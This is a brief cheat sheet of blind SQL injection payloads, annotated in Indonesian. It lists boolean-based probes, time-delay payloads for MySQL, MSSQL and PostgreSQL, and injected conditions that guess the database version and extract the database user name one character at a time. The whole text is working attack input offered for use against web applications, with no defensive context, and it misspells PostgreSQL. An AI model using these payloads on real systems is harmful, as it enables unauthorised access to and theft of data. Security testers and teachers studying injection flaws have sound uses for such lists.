Blind SQL injection

 

Boolean Based and Time based Blind SQLI

1. and 1=1

2. and 1=2

3. and sleep(5)           👈 MySQL

4. waitfor delay '0:0:5'           👈 MSSQL

5. and pg_sleep(5)           👈 PostrageSQL

6. AND (SELECT * FROM (SELECT(SLEEP(5)))TESTTEST)

Version()

7. and substring(@@version,1,1)=4           👈 Jika versi databasenya 4 maka akan true atau tidak error

-  and substring(@@version,1,1)=5

 

User()

8. and mid(user(),1,1)=CHAR(83)           👈Untuk menebak angka pertama user()

 - and mid(user(),1,2)=CHAR(83,77)           👈untuk menebak angka kedua user()

 - and mid(user(),1,3)=CHAR(83,77,65)          👈untuk menebak angka ketiga user()

 - and mid(user(),1,4)=CHAR(83,77,65,78)          👈untuk menebak angka keempta user()